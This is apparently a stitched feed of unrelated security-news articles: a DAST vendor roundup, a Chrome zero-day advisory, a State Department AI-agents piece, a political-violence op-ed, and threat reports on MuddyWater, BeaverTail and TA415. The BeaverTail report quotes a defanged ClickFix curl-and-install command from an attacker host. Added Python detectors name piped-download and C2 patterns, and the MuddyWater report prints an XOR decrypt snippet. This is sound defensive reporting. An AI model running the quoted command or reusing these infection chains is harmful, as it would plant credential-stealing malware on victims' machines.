Dynamic Application Security Testing (DAST) platforms have become fundamental for safeguarding web applications as digital assets and attack surfaces scale in both size and complexity.
The modern DAST landscape is shaped by increased API adoption, rapid deployment cycles, and the rise of AI-driven vulnerabilities, making 2025 a turning point for intelligent, automated security solutions.
This article presents a comprehensive review of the top 10 DAST platforms for 2025, with technical evaluation, clear pros and cons, and direct comparison.
Web application threats have evolved significantly, with the majority of breaches today resulting from vulnerabilities in running code exposed by dynamic user interactions and APIs.
DAST platforms are uniquely suited to identify these runtime weaknesses, deliver actionable insights for remediation, and verify security postures across modern environments.
Why Dynamic Application Security Testing (DAST) Platforms In 2025
The explosion of cloud-native apps, APIs, and AI services means threats are no longer static: new vulnerabilities and misconfigurations rapidly emerge at runtime.
DAST platforms merge automated, continuous scanning, smart integrations, and threat intelligence, making them indispensable for organizations prioritizing uninterrupted development, regulatory compliance, and risk reduction.
In 2025, leading tools leverage AI, predictive analytics, and continuous monitoring for superior protection, supporting both traditional web architectures and API-first, microservices environments.
Comparison Table: Dynamic Application Security Testing (DAST) Platforms In 2025
Its proof-based scanning technology ensures exploitability confirmation with industry-leading accuracy, drastically reducing false positives and accelerating remediation.
AI-powered features surface complex vulnerabilities and prioritize actionable risks through predictive scoring and in-depth technical reports.
Integration with over 50 developer tools makes Invicti seamless across CI/CD and development pipelines. Native IAST and full API testing covering REST, SOAP, GraphQL, and gRPC ensure coverage of modern architectures.
The platform merges DAST, API Security, SCA, and ASPM, providing unified risk insights in real time.
Invicti is ideal for large organizations needing scale, compliance-driven workflows, and measurable security outcomes.
Specifications
Invicti supports automated scanning at scale and integrates natively with developer toolchains, CI/CD platforms, and ticketing systems.
The engine offers predictive risk modeling, technical remediation guidance, and role-based access management for compliance and large teams.
Scanning covers single-page apps, advanced login mechanisms, and hidden API endpoints.
Invicti achieves 99.98% vulnerability validation using its proprietary scanner, and is upgradable to include SAST/SCA modules from Mend.io for complete AppSec management.
Reason to Buy
Organizations benefit from Invicti’s proof-based results, comprehensive reporting, and regulatory compliance support.
AI-enhanced vulnerability detection addresses real-world and emerging threats, minimizing manual overhead for AppSec teams.
Extensive integrations streamline security testing into SDLC workflows, and multi-policy scanning enables tailored risk management across complex environments.
Acunetix delivers powerful DAST and IAST capabilities optimized for SMBs and mid-market organizations needing reliable, granular vulnerability detection.
Its focus on deep web scanning includes advanced crawling and proof-based findings, reducing false positives and supporting compliance programs.
The platform is approachable for mid-sized teams, blending automation with fine-tuned scanning logic suitable for both simple and complex web apps.
Integration options allow Acunetix to fit seamlessly into CI/CD pipelines, while its detailed reports help expedite remediation and compliance documentation.
Comprehensive training resources and technical support are available for onboarding and skill development.
Specifications
Acunetix utilizes dynamic and interactive scanning engines to analyze live web apps, APIs, and password-protected or multi-page forms.
It includes automated vulnerability management, compliance-ready reporting, and CI/CD integration support. The pricing model supports SMB adoption.
Its AcuSensor feature provides IAST-like insights identifying more vulnerabilities inside runtime environments compared to pure black-box scanners.
Reason to Buy
With proof-based validation and extensive vulnerability coverage, Acunetix efficiently meets compliance and remediation needs for organizations that want certainty in their app security.
The platform balances configuration granularity with usability, making accurate testing readily accessible for teams without extensive security expertise.
Features
Automated scanning, IAST-style proof agent, advanced crawl and API discovery, compliance reporting, customizable dashboard, CI/CD and ticketing integration, and support for OpenAPI3, Swagger2, and RAML APIs.
Pros
Intuitive interface and strong reporting
Granular scanning for complex web technologies
Good value for SMBs
Compliance-specific scan modules
Cons
Multi-domain apps require separate configs
Limited AI and automation depth compared to enterprise platforms
Best For: SMBs, compliance-driven programs, technical security analysts
Burp Suite DAST provides scalable enterprise scanning, reputable for minimizing false positives and maximizing operational efficiency across complex portfolios.
Automation capabilities extend from basic web scanning to continuous and out-of-band testing, targeting web apps, APIs, and advanced login flows.
Burp’s deep integration into CI/CD and reporting tools supports DevSecOps, and its role-based access model makes it a fit for organizations scaling development and security teams.
The platform is well-recognized for flexibility, scheduling, and bulk scan operation.
Specifications
Server-deployed, accessed via a web interface and REST API, Burp Suite DAST supports extreme scalability and multi-user management.
Automated scanning modules are configurable for target navigation and privileged areas, including SPAs and API endpoints with OpenAPI, Swagger, and Postman support.
Advanced scan modes balance depth and speed, with scalable parallel scans across portfolios.
Reason to Buy
Burp Suite DAST is a top choice for automated, scheduled scanning needs while delivering robust reporting, compliance, and CI/CD-friendly integration for web application teams.
Organizations benefit from broad portfolio coverage and operational flexibility.
Features
Automated and scalable scanning, API scanning, advanced browser navigation, continuous schedule, CI/CD integration, OAST capabilities, and customizable reporting with broad format support.
Pros
Highly scalable architecture
Bulk scheduling and automation
Deep API and SPA scan support
Industry-low false positives
Cons
Steeper learning curve for initial setup
Separate licensing needed for some features
Best For: Enterprise teams, DevSecOps environments, high-volume scanning
Checkmarx offers a unified security testing experience with effortless setup and actionable insights, making it suitable for both developer-centric and compliance-driven security teams.
The platform’s integration with AI and ASPM ensures ongoing risk prioritization and the ability to streamline scans into CI/CD pipelines.
Comprehensive API security and advanced authentication flows set Checkmarx apart for organizations dealing with interconnected web applications.
The streamlined interface expedites onboarding, offering immediate value through automated configuration and clear vulnerability mapping.
Specifications
Checkmarx DAST supports real-time analysis, full SDLC integration, browser-based and automated authentication, API security scanning (REST, SOAP, gRPC), and risk-based vulnerability scoring.
Compliance mapping and detailed reporting make it suitable for regulated industries.
Reason to Buy
Organizations seeking actionable, risk-based insights benefit from Checkmarx’s ability to prioritize and automate discovery and remediation, blending coverage with operational simplicity.
Rapid7 InsightAppSec reimagines vulnerability management for hybrid and AI-powered applications, integrating threat intelligence with exposure command for context-rich remediation.
New features include advanced LLM scanning for AI-powered threats, developer-centric reporting, and seamless cloud-to-code visibility.
Automated pre-production testing extends coverage to internal web apps on closed networks for organizations needing layered security assurance.
Specifications
Rapid7 provides black-box testing and universal translation for modern web, mobile, and cloud APIs.
The platform supports advanced dashboard customization, SOAR integration, and context-driven risk scoring. LLM-specific test modules address prompt injection and AI app risks.
Reason to Buy
Organizations deploying both legacy and GenAI-based applications benefit from Rapid7’s focus on new attack surfaces and intelligent remediation workflows that reduce operational overhead.
Veracode’s cloud-native platform stands out for rapid onboarding, automated scanning, and actionable results with industry-low false positive rates.
Real-time feedback, flexible scheduling, and granular scan management are ideal for companies needing both depth and scale in their security program.
The unified dashboard visualizes AppSec status and remediation priorities across dynamic assets and APIs. Integrations allow for continuous security throughout development and deployment.
Specifications
Automated DAST and API scanning, multi-environment support, AI-based login script creation, centralized risk dashboard, and compliance reporting.
Platform scales from single web apps to hundreds of assets across internal and external environments.
Reason to Buy
Speed, scalability, and <5% false positive rates make Veracode a reliable choice for security teams needing trusted, automated protection and actionable remediation insights.
OpenText Fortify DAST merges in-depth web application scanning with event-based macro recording and advanced multi-policy scans, suitable for organizations needing flexibility and precision.
Its intelligent engines customize attacks based on app structure, offering real-time audit and crawl logic.
Composite settings allow for tailored configurations, marrying traditional and AI-driven assessment across service-oriented architectures.
Specifications
Supports composite scan settings, multi-policy scanning, modern authentication flows, expanded gRPC and OpenAPI/YAML API coverage, customizable reporting, and event-driven macro recorder.
Reason to Buy
OpenText Fortify’s flexible configuration, advanced multi-service and API scanning, and compliance reporting make it indispensable for teams handling complex or regulated environments.
Features
Macro recording, gRPC/REST/SOAP API scan, event-driven configuration, composite scan settings, customizable user agents, multi-format reporting.
Pros
Versatile scan configurations
Supports advanced authentication workflows
Comprehensive vulnerability database
Detailed remediation and prevention guidance
Cons
Complex configuration for new users
Premium support required for custom setups
Best For: Regulated sectors, APIs, organizations with complex authentication needs
Intruder delivers automated attack surface management and DAST scanning focusing on simplicity, continuous monitoring, and deep integration with DevOps and issue trackers.
Combining commercial and open-source engines, it efficiently identifies known vulnerabilities and configuration weaknesses for SMBs and lean security teams.
Specifications
Cloud-based, easy-to-configure, integrates with CI/CD and ticketing systems, and offers continuous asset monitoring. Supports authenticated and unauthenticated web app scanning.
Reason to Buy
Intruder’s straightforward setup, automated vulnerability scanning, and prioritization make it ideal for smaller organizations or those seeking low-overhead security management.
Astra Security blends automated vulnerability scanning with manual pentesting and AI-first defensive strategies, providing a 360° view of security posture and continuous proactive insights.
The platform supports more than 10,000 security checks per scan and targets known vulnerabilities as well as custom exploits.
Specifications
Intelligent scanner, manual pentest augmentation, real-time reporting, and compliance-driven scan options. Designed to simplify findings interpretation and empower both security experts and business users.
Reason to Buy
Astra Security simplifies security for organizations needing actionable, interpretable results and manual expert guidance on top of automated DAST scanning.
Aikido Security unifies SAST and DAST scanning, offering developer-friendly, context-aware vulnerability identification and AI-powered autofix features.
It’s designed for “no-nonsense security” that integrates directly with developer workflows (CI/CD, IDEs, GitHub, Slack) and provides one-click remediation for typical findings.
Automated API discovery, authenticated scans, and actionable advice distinguish the platform for collaborative security teams.
Developer-centric organizations benefit from real-time feedback as part of daily workflows, AI-generated fixes, and high accessibility for both lean and enterprise teams.
Choosing the best DAST platform in 2025 means balancing automation, integration, API and cloud coverage, proof-based validation, and AI-driven insights for sustainable web security.
Invicti, Acunetix, and Burp Suite deliver enterprise-grade automation and accuracy; Checkmarx and Veracode excel in unified, API-ready workflows; Rapid7 and Fortify add compliance and risk intelligence; Intruder, Astra, and Aikido provide agile, developer-friendly experiences for lean teams.
As attack surfaces expand, these platforms deliver essential protection for organizations of any scale and digital maturity.
Google has released an emergency security update for its Chrome web browser to address a high-severity zero-day vulnerability that is being actively exploited in the wild.
Users are strongly urged to update their browsers immediately to protect against potential attacks. The vulnerability, tracked as CVE-2025-10585, is the latest in a series of zero-days discovered and patched in Chrome this year.
The new stable channel version has been updated to 140.0.7339.185/.186 for Windows and Mac, and 140.0.7339.185 for Linux.
Google has stated that the update will be rolling out to all users over the coming days and weeks. To mitigate the immediate threat, users should manually trigger the update process to ensure they are protected.
Zero-Day Vulnerability Exploited
The actively exploited vulnerability, CVE-2025-10585, is a Type Confusion flaw in the V8 JavaScript and WebAssembly engine.
Type confusion bugs occur when a program allocates a resource or object using one type but later accesses it with a different, incompatible type. This can lead to logical errors, memory corruption, and ultimately, arbitrary code execution.
A successful exploit could allow a remote attacker to escape the browser’s security sandbox by tricking a user into visiting a specially crafted, malicious webpage.
The vulnerability was reported on September 16, 2025, by Google’s own Threat Analysis Group (TAG), which typically finds zero-days being used in targeted attacks by sophisticated threat actors.
Other Vulnerabilities
In addition to the zero-day, this security update addresses three other high-severity vulnerabilities discovered by external security researchers.
The first, CVE-2025-10500, is a use-after-free vulnerability in Dawn, a graphics abstraction layer. The second, CVE-2025-10501, is also a use-after-free flaw, found in the WebRTC component, which enables real-time communication.
The third vulnerability, CVE-2025-10502, is a heap buffer overflow in ANGLE, a graphics engine translation layer. Use-after-free and heap overflow vulnerabilities can also lead to memory corruption and arbitrary code execution.
Google has awarded bug bounty payments of $15,000 and $10,000 for the discovery of two of these flaws.
Given the confirmation of active exploitation, the risk to unpatched systems is significant. All Google Chrome users on Windows, macOS, and Linux are advised to update their browsers to the latest version without delay.
To check your Chrome version and apply the update, navigate to the “Help” menu and select “About Google Chrome.” The browser will automatically check for and download the latest update, after which a restart will be required to apply the patch.
Google is currently restricting access to the bug details and links related to CVE-2025-10585 to prevent further abuse while the patch is being rolled out to the majority of its user base.
The State Department wants to have artificial intelligence agents that can take action for employees, the department's chief information officer Kelly Fletcher said Wednesday.
The department already has an enterprise generative-AI chatbot, dubbed StateChat, which it launched last year. That chatbot can help with translations or answer questions from the department's foreign-affairs manual, Fletcher said at an ACT-IAC event Wednesday.
Now the department is looking at “AI agents that will take actions for humans,” said Fletcher. “I want it to not only tell me, ‘How much leave do I have’ … but then I want it to put in my leave slip, which is in a different system. We're building to that.”
That action-taking is what distinguishes AI agents from generative AI. It’s something that the AI company Anthropic, behind large language model Claude, is zeroed in on.
Co-founder Jack Clark said Monday during a D.C. forum that, by the end of 2026 or early 2027, Anthropic expects to build systems that “won’t just passively answer questions,” but can “be given tasks that take hours, days or weeks to complete and then go off and do them autonomously.”
Although agentic AI offers the potential to help automate operations and increase productivity, the technology also comes with risks, including oversight challenges, difficulties in testing and evaluation and the potential for job displacement.
The government’s chief information officer, Greg Barbaccia, has said that he wants to use AI to help make up for losses across the federal workforce as the Trump administration has shed thousands of workers. Among them is State's own former chief data officer and AI officer, Matthew Graviss, who left the department in February after over four years working there.
Despite AI's potential, Fletcher said that adoption hasn’t necessarily been easy at State.
The department initially rolled out its chatbot to 3,000 beta testers. Now it is being used by 45,000 to 50,000 of the department’s 80,000 workers, said Fletcher, who noted that “it has taken a huge amount of education and training” to get those users.
“One month ago, I answered the question, ‘Is it allowable for me to use it?'” she said. “Something I wildly underestimated with AI is the amount of training and education and conversation required to get folks who would benefit greatly from it to use it.”
The chatbot can help State employees navigate internal policies.
“If you need to know how to move your cat with you to Conakry,” she offered as an example, the chatbot will show you “all the locations [in State policies] that explain how to move a cat.”
“Then we'll let you click on them and read the actual text or give you a summary,” she said. “The idea here is, in large part, to reduce administrative toil.”
For agents, Fletcher said that her goal is to put the department's administrative functions behind one chatbot and consolidate other potential agents around certain mission sets.
“Looking forward, I think that AI is going to be embedded in just about everything,” said Fletcher, offering the potential for AI to prioritize cybersecurity alerts as an example. State is also testing a chatbot to help users navigate its electronic health record patient portal.
“I think the trick is going to be, 'How do we embed it smartly, and how do we ensure that people know what to use it for?'” she said.
After the Sept. 10, 2025, assassination of conservative political activist Charlie Kirk, President Donald Trump claimed that radical leftist groups foment political violence in the U.S., and “they should be put in jail.”
“The radical left causes tremendous violence,” he said, asserting that “they seem to do it in a bigger way” than groups on the right.
Top presidential adviser Stephen Miller also weighed in after Kirk’s killing, saying that left-wing political organizations constitute “a vast domestic terror movement.”
“We are going to use every resource we have…throughout this government to identify, disrupt, dismantle and destroy these networks and make America safe again,” Miller said.
But policymakers and the public need reliable evidence and actual data to understand the reality of politically motivated violence. From our research on extremism, it’s clear that the president’s and Miller’s assertions about political violence from the left are not based on actual facts.
Based on ourown research and a review of related work, we can confidently say that most domestic terrorists in the U.S. are politically on the right, and right-wing attacks account for the vast majority of fatalities from domestic terrorism.
The understanding of political violence is complicated by differences in definitions and the recent Department of Justice removal of an important government-sponsored study of domestic terrorists.
Political violence in the U.S. has risen in recent months and takes forms that go unrecognized. During the 2024 election cycle, nearly half of all states reported threats against election workers, including social media death threats, intimidation and doxing.
Kirk’s assassination illustrates the growing threat. The man charged with the murder, Tyler Robinson, allegedly planned the attack in writing and online.
This follows other politically motivated killings, including the June assassination of Democratic Minnesota state Rep. and former House Speaker Melissa Hortman and her husband.
These incidents reflect a normalization of political violence. Threats and violence are increasingly treated as acceptable for achieving political goals, posing serious risks to democracy and society.
But different agencies and researchers use different definitions of political violence, making comparisons difficult.
The FBI and Department of Homeland Security define domestic violent extremism as threats involving actual violence. They do not investigate people in the U.S. for constitutionally protected speech, activism or ideological beliefs.
Domestic violent extremism is defined by the FBI and Department of Homeland Security as violence or credible threats of violence intended to influence government policy or intimidate civilians for political or ideological purposes. This general framing, which includes diverse activities under a single category, guides investigations and prosecutions.
Datasets compiled by academic researchers use narrower and more operational definitions. The Global Terrorism Database counts incidents that involve intentional violence with political, social or religious motivation.
These differences mean that the same incident may or may not appear in a dataset, depending on the rules applied.
The FBI and Department of Homeland Security emphasize that these distinctions are not merely academic. Labeling an event “terrorism” rather than a “hate crime” can change who is responsible for investigating an incident and how many resources they have to investigate it.
Right-wing extremist violence has been deadlier than left-wing violence in recent years.
Based on government and independent analyses, right-wing extremist violence has been responsible for the overwhelming majority of fatalities, amounting to approximately 75% to 80% of U.S. domestic terrorism deaths since 2001.
By contrast, left-wing extremist incidents, including those tied to anarchist or environmental movements, have made up about 10% to 15% of incidents and less than 5% of fatalities.
There’s another reason it’s hard to account for and characterize certain kinds of political violence and those who perpetrate it.
The U.S. focuses on prosecuting criminal acts rather than formally designating organizations as terrorist, relying on existing statutes such as conspiracy, weapons violations, RICO provisions and hate crime laws to pursue individuals for specific acts of violence.
The State Department’s Foreign Terrorist Organization list applies only to groups outside of the United States. By contrast, U.S. law bars the government from labeling domestic political organizations as terrorist entities because of First Amendment free speech protections.
Without harmonized reporting and uniform definitions, the data will not provide an accurate overview of political violence in the U.S.
But we can make some important conclusions.
Politically motivated violence in the U.S. is rare compared with overall violent crime. Political violence has a disproportionate impact because even rare incidents can amplify fear, influence policy and deepen societal polarization.
Trump and members of his administration are threatening to target whole organizations and movements and the people who work in them with aggressive legal measures – to jail them or scrutinize their favorable tax status. But research shows that the majority of political violence comes from people following right-wing ideologies.
Since early 2025, cybersecurity teams have observed a marked resurgence in operations attributed to MuddyWater, an Iranian state–sponsored advanced persistent threat (APT) actor.
Emerging initially through broad remote monitoring and management (RMM) exploits, the group has pivoted to highly targeted campaigns employing custom malware backdoors and multi-stage payloads designed to evade detection.
Rather than relying solely on off-the-shelf tools, the adversary has expanded its arsenal to include bespoke implants such as BugSleep, StealthCache, and the Phoenix backdoor.
These components work in concert to establish covert footholds, extract sensitive data, and mask infrastructure using commercial services at scale.
Attack vectors continue to center on spear-phishing emails embedding malicious Microsoft Office documents.
Threat actor profile (Source – Group-IB)
Victims receive decoy documents laced with VBA macros that drop and execute secondary payloads from Cloudflare-protected domains.
Infected hosts then reach out to command-and-control (C2) servers hosted across mainstream and bulletproof providers—ranging from AWS and DigitalOcean to Stark Industries—before shifting communication behind Cloudflare proxies to obscure origin IPs.
Group-IB analysts noted that Cloudflare’s reverse-proxy service dramatically increases the difficulty of tracking active C2 endpoints, as all traffic appears to originate from shared Cloudflare hosts.
Initial loader
Upon execution, the initial loader (commonly named wtsapi32.dll) decrypts and injects the StealthCache backdoor into legitimate processes.
Infection Chain (Source – Group-IB)
StealthCache establishes a pseudo-TLV protocol over HTTPS, sending and receiving encrypted commands at endpoint /aq36 and reporting errors at /q2qq32.
Group-IB analysts identified custom XOR routines that dynamically derive decryption keys from the victim’s device and username strings, thwarting sandbox analysis when executed on mismatched hosts.
In its latest operational phase, MuddyWater’s multi-stage approach has delivered a trio of payloads: an initial VBA dropper, a loader such as Fooder, and a feature-rich backdoor like StealthCache.
Upon receiving a command code, StealthCache executes actions ranging from interactive shells to file exfiltration:
// Decrypt function snippet (the XOR routine as reported; headers added so the snippet compiles as shown)
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Repeating-key XOR: every byte of the buffer is XORed with the key byte at
// position i mod key length, so the same call both encrypts and decrypts.
void decrypt_payload(uint8_t *buffer, size_t size, const char *key) {
    for (size_t i = 0; i < size; ++i) {
        buffer[i] ^= key[i % strlen(key)];
    }
}
Subsequently, the Phoenix backdoor is deployed from the loader’s memory space. Phoenix registers with its C2 via /register, then periodically posts beacons to /imalive and polls /request for further instructions.
This modular design enables seamless command updates and payload swaps without writing to disk, reinforcing persistence and minimizing forensic artifacts.
By leveraging Cloudflare to mask true server endpoints and integrating dynamic decryption keyed to host identifiers, MuddyWater has crafted a resilient, multi-stage infection chain that remains elusive to network defenders.
Continuous monitoring of Cloudflare-associated domains, alongside vigilant analysis of unique mutex names and C2 URL patterns, is essential for preempting new campaigns and safeguarding critical infrastructure.
A sophisticated North Korean nation-state threat actor campaign has emerged, distributing an evolved variant of the BeaverTail malware through deceptive fake hiring platforms and ClickFix social engineering tactics.
This latest campaign, active since May 2025, represents a significant tactical shift as threat actors expand beyond their traditional software developer targets to pursue marketing professionals, cryptocurrency traders, and retail sector personnel.
The malware distribution infrastructure centers around a fraudulent hiring website hosted at businesshire[.]top, masquerading as a legitimate recruitment platform.
The site offers positions including cryptocurrency trader roles at four web3 organizations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer.
When job seekers attempt to record mandatory video responses during the fake application process, they encounter fabricated technical errors requiring them to execute malicious system commands as troubleshooting steps.
GitLab analysts identified this campaign through infrastructure analysis that revealed the threat actor’s backend service hosted at nvidiasdk.fly[.]dev remains active as of publication.
The campaign demonstrates notable operational refinements, including the compilation of BeaverTail into standalone executables rather than relying on JavaScript interpreters, enabling the malware to function on systems without standard development tools typically found on non-technical users’ machines.
The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure.
The malicious service employs dynamic user agent header verification, responding with legitimate decoy payloads when accessed without specific numeric headers.
For example, requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables, while authentic infection attempts using headers like “203” trigger the deployment of actual BeaverTail payloads.
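As an added defensive example (not Group-IB's or GitLab's code), the following Python correlates constructed proxy-log lines against two fingerprints described on this page: the StealthCache and Phoenix C2 paths from the MuddyWater write-up above, and the numeric User-Agent that gates BeaverTail delivery. The log format, addresses and timestamps are constructed, and because a Cloudflare-fronted C2 shows a shared proxy address on the destination side, the rules lean on the path sequence seen from each source host.

```python
"""Proxy-log correlation for the C2 URL patterns in the MuddyWater write-up
(StealthCache: /aq36 and /q2qq32; Phoenix: /register, /imalive, /request)
and the numeric User-Agent gating in the BeaverTail write-up (curl -A 204).
Added example, not Group-IB's or GitLab's tooling; the log format and every
sample line below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

STEALTHCACHE_PATHS = {"/aq36", "/q2qq32"}              # distinctive: flag on a single hit
PHOENIX_PATHS = {"/register", "/imalive", "/request"}  # generic words: need the full lifecycle
NUMERIC_UA = re.compile(r"^\d{1,4}$")                  # "curl -A 204" style User-Agent

# Constructed format: timestamp src dst method path status user_agent
SAMPLE_LOG = """\
2025-09-18T10:00:01Z 10.1.2.3 203.0.113.10 POST /register 200 Mozilla/5.0
2025-09-18T10:00:31Z 10.1.2.3 203.0.113.10 POST /imalive 200 Mozilla/5.0
2025-09-18T10:01:01Z 10.1.2.3 203.0.113.10 GET /request 200 Mozilla/5.0
2025-09-18T10:01:31Z 10.1.2.3 203.0.113.10 POST /imalive 200 Mozilla/5.0
2025-09-18T10:02:31Z 10.1.2.3 203.0.113.10 POST /imalive 200 Mozilla/5.0
2025-09-18T10:05:00Z 10.1.2.9 198.51.100.7 POST /aq36 200 Mozilla/5.0
2025-09-18T10:07:00Z 10.1.2.20 192.0.2.55 POST /register 201 Mozilla/5.0
2025-09-18T10:08:00Z 10.1.2.20 192.0.2.55 GET /api/users 200 Mozilla/5.0
2025-09-18T10:09:00Z 10.1.2.31 192.0.2.80 GET /nvs 200 204
"""


def parse_line(line):
    ts, src, dst, method, path, status, ua = line.split(maxsplit=6)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
            "dst": dst, "method": method, "path": path.split("?", 1)[0].lower(),
            "status": int(status), "ua": ua}


def beacon_intervals(times):
    times = sorted(times)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def is_regular(intervals, tolerance=0.2):
    """True when at least two intervals all sit within tolerance of their mean."""
    if len(intervals) < 2:
        return False
    mean = sum(intervals) / len(intervals)
    return mean > 0 and all(abs(i - mean) <= tolerance * mean for i in intervals)


def detect(log_text):
    """Group requests per (src, dst) flow and label the suspicious ones."""
    flows = defaultdict(lambda: {"paths": set(), "imalive": [], "numeric_ua": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = parse_line(line)
        f = flows[(e["src"], e["dst"])]
        f["paths"].add(e["path"])
        if e["path"] == "/imalive":          # Phoenix beacon endpoint
            f["imalive"].append(e["ts"])
        if NUMERIC_UA.match(e["ua"]):        # BeaverTail-style numeric header
            f["numeric_ua"] = True
    findings = {}
    for key, f in flows.items():
        labels = []
        if f["paths"] & STEALTHCACHE_PATHS:
            labels.append("stealthcache-c2")
        if PHOENIX_PATHS <= f["paths"]:      # register, beacon and poll all seen
            labels.append("phoenix-lifecycle")
            if is_regular(beacon_intervals(f["imalive"])):
                labels.append("regular-beacon")
        if f["numeric_ua"]:
            labels.append("numeric-user-agent")
        if labels:
            findings[key] = labels
    return findings


if __name__ == "__main__":
    for (src, dst), labels in sorted(detect(SAMPLE_LOG).items()):
        print(f"{src} -> {dst}: {', '.join(labels)}")
```

A host that only hits /register (as ordinary web apps do) is deliberately not flagged; the Phoenix rule fires only when all three endpoints appear on one flow.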
Technical Infection Chain Analysis
The BeaverTail infection mechanism varies significantly across operating systems, demonstrating the threat actor’s technical sophistication and commitment to cross-platform targeting.
Infection chains (Source – GitLab)
On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg, which contains no payload data but executes a malicious preinstall script.
This script attempts to exfiltrate stored passwords from the non-standard ~/.myvars file location before downloading additional components from a GitHub repository hosted at /RominaMabelRamirez/dify.
The infection chain proceeds through the execution of downx64.sh, which retrieves two unsigned Mach-O binaries: x64nvidia containing the stripped-down BeaverTail variant, and payuniversal2, a PyInstaller-compiled version of InvisibleFerret.
The malware exhibits intelligent redundancy mechanisms, executing the InvisibleFerret binary only when Python 3 is unavailable at common installation locations or when BeaverTail execution fails to create the expected ~/.npc entry point file within ten seconds.
curl -k -A 204 -o /var/tmp/nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer -pkg /var/tmp/nvidia[.]pkg -target /
Windows infections follow a different trajectory, with the ClickFix command downloading nvidia.tar.gz containing multiple components including a renamed 7zip executable and a VisualBasic launcher script.
The update.vbs script performs dual functions: extracting password-protected Python dependencies to a hidden .pyp directory using the hardcoded password “ppp,” and launching the primary nvidiasdk[.]exe executable containing the compiled BeaverTail variant.
Linux systems receive the most streamlined infection vector, with malicious scripts delivered directly through wget and piped into bash execution.
The script installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail functionally identical to the compiled versions deployed on other platforms.
This variant demonstrates reduced complexity compared to previous BeaverTail iterations, targeting only eight browser extensions rather than the typical 22, and omitting dedicated data extraction functions for browsers beyond Chrome.
The simplified codebase reduces overall malware size by approximately one-third while maintaining core credential stealing and cryptocurrency wallet targeting capabilities.
Command and control communications utilize the IP address 172.86.93[.]139 with “tttttt” serving as the campaign identifier across all infected systems.
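Detection logic for the three infection chains described above, run over constructed process command-line records; this is an added defender-side example, not code from GitLab's analysis or the original article. The indicators (numeric -A header chained into installer -pkg, download piped into a shell, update.vbs, the .pyp directory, nvidiasdk.exe, the staging host and the C2 address) are those named in the write-up; host names and the benign records are assumed.

```python
import re

# Constructed process command-line records modelled on the campaign (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "mac-01", "cmd": "curl -k -A 204 -o /var/tmp/nvidia.pkg "
                              "https://nvidiasdk.fly.dev/nvs && sudo installer -pkg /var/tmp/nvidia.pkg -target /"},
    {"host": "mac-02", "cmd": "curl -sSL https://updates.example.org/agent.sh -o /tmp/agent.sh"},
    {"host": "lin-01", "cmd": "wget -qO- https://nvidiasdk.fly.dev/lin | bash"},
    {"host": "win-01", "cmd": "wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\nvidia\\update.vbs"},
    {"host": "lin-02", "cmd": "npm install"},
]

# Each rule pairs a name with a regex over the full command line; indicators are
# taken from the report above.
RULES = [
    # curl with a purely numeric User-Agent, chained into the macOS package installer
    ("clickfix_curl_numeric_ua_installer",
     re.compile(r"\bcurl\b.*\s-A\s+\d{3}\b.*\binstaller\s+-pkg\b")),
    # download piped straight into a shell (the Linux vector)
    ("download_piped_to_shell",
     re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba)?sh\b")),
    # Windows launcher script, hidden dependency directory, or renamed payload
    ("beavertail_windows_launcher",
     re.compile(r"update\.vbs\b|\\\.pyp\\|nvidiasdk\.exe", re.IGNORECASE)),
    # staging host and C2 address named in the report
    ("beavertail_infrastructure",
     re.compile(r"nvidiasdk\.fly\.dev|\b172\.86\.93\.139\b")),
]


def classify(cmd: str) -> list[str]:
    """Return the names of all rules the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map host -> matched rule names, omitting hosts with no hits."""
    hits: dict[str, list[str]] = {}
    for ev in events:
        matched = classify(ev["cmd"])
        if matched:
            hits.setdefault(ev["host"], []).extend(matched)
    return hits


if __name__ == "__main__":
    for host, rules in scan(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

The numeric-User-Agent rule is the one that survives infrastructure changes, since the decoy logic depends on that header; the host and IP rules go stale as soon as the actor rotates infrastructure.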
The Chinese state-sponsored threat actor TA415 has evolved its tactics, techniques, and procedures by leveraging legitimate cloud services like Google Sheets and Google Calendar for command and control communications in recent campaigns targeting U.S. government, think tank, and academic organizations.
Throughout July and August 2025, this sophisticated group conducted spearphishing operations using U.S.-China economic-themed lures, masquerading as prominent figures including the current Chair of the Select Committee on Strategic Competition between the United States and the Chinese Communist Party.
TA415, also known as APT41, Brass Typhoon, and Wicked Panda, represents a significant shift in state-sponsored cyber operations by abandoning traditional malware delivery mechanisms in favor of legitimate development tools.
The group’s latest campaigns have consistently utilized trusted services for command and control infrastructure, demonstrating a deliberate strategy to blend malicious activities with normal network traffic patterns.
This approach significantly complicates detection efforts as security tools must distinguish between legitimate business communications and adversarial command channels.
Proofpoint researchers identified that TA415’s recent operations primarily focused on intelligence collection regarding the trajectory of U.S.-China economic relations, aligning with broader geopolitical tensions and ongoing trade negotiations.
The timing of these campaigns coincides with critical policy discussions surrounding U.S.-Taiwan relations and comprehensive sanctions frameworks targeting China, suggesting targeted intelligence requirements from state-level decision makers.
The threat actor’s infection methodology involves delivering password-protected archives through cloud sharing services including Zoho WorkDrive, Dropbox, and OpenDrive.
These archives contain Microsoft Shortcut files alongside hidden components stored within concealed MACOS subfolders.
The group consistently employs Cloudflare WARP VPN services to obscure sender IP addresses during email transmission, adding an additional layer of operational security to their campaigns.
Advanced Infection Chain Analysis
The TA415 infection mechanism demonstrates sophisticated understanding of legitimate development workflows through its deployment of Visual Studio Code Remote Tunnels.
TA415 VS Code Remote Tunnel infection chain (Source – Proofpoint)
Upon execution, the malicious LNK file triggers a batch script named logon.bat, which subsequently launches the WhirlCoil Python loader through an embedded Python package.
